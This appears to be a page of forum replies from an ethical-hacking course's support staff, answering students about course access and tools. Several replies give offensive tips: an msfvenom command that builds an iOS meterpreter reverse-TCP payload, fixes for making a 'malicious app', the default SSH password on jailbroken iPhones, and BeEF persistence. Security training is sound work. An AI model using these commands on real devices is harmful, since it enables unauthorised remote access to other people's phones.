Forum Replies Created
- Posts
Hi!
Yeah, all the updates are added to the Udemy courses as well, but in that case the only certificate you will get would be from Udemy and not from Zsecurity. The only way to get a Zsecurity certificate is to take the course in this website.Greetings!
DiegoHi!
No, that course can only be taken in Udemy, I meant it won’t be part of the courses in your zsecurity’s account. Inside the course you’ll find a Q&A section where you can ask any doubt you have.Greetings!
DiegoHi!
You can send an email to [email protected] and ask them about it, I don’t have that info.
Also you can get the courses on Udemy, they have sales very often.Greetings!
DiegoHi!
For iPhones, the process is harder, because Apple does not let its users to install applications outside the App Store, so what you can do in case of iOS is to try and scan it as shown in the course to check if it has any vulnerable service on open ports using Zenmap or any other vulnerability scanner, though I don’t think that you will get that much from the scan results if the phone wasn’t jailbroken, but it’s worth to try and see. Also, if the iPhone was jailbroken, then the procedure will be a lot easier (Take for example the SSH service running on port 22 with a default password of Alpine). There are other social engineering techniques that can be used to gain access, but they’re not very realistic and it’s not worth even to try them sometimes.
Greetings!
DiegoHi!
I have already told what you need to remove, so if you follow what I mentioned you would just run a command like:
msfvenom -p apple_ios/meterpreter_reverse_tcp LHOST=ip LPORT=port -f myfileWhy do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or ipad.Thanks!
DiegoHi!
I’ll suggest to read properly what I wrote above, I mentioned to delete -a because using osx-app is incorrect.Greetings!
DiegoHi!
Yes, if the victim closes the hooked webpage then the connection will be lost. There are several other methods that can be used to make beef more persistent, checkout the following post for more info https://github.com/beefproject/beef/wiki/Persistence
Greetings!
DiegoHi!
You are combining options that won’t work. If you want to create an iOS malicious app then you can set the architecutre to osx-app nor can select the format as exe, that’s a windows thing only, neither add .exe extension to the name of the file. So I’ll suggest to remove -a anf -f and use a file name without extensions for -o, msfvenom should add the proper values by default.
Greetings!
DiegoHi!
This is covered in the website hacking course, amongst other cool web attacks. But here is an article you can read: https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
In any case this won’t work to revocer your gmail password, google servers are well protected against this kind of attacks and you will end up blocking your account or getting your ip banned for a time, so I won’t suggest to try it. Instead use the recover password methods offered by gmail.
Greetings!
DiegoHi!
MITMF is not showed anymore in the courses because it’s outdated, use bettercap instead. And the repositories you have added to your kali machine are not the offical ones, so it’s very likely that many tools can’t be found.Greetings!
Diego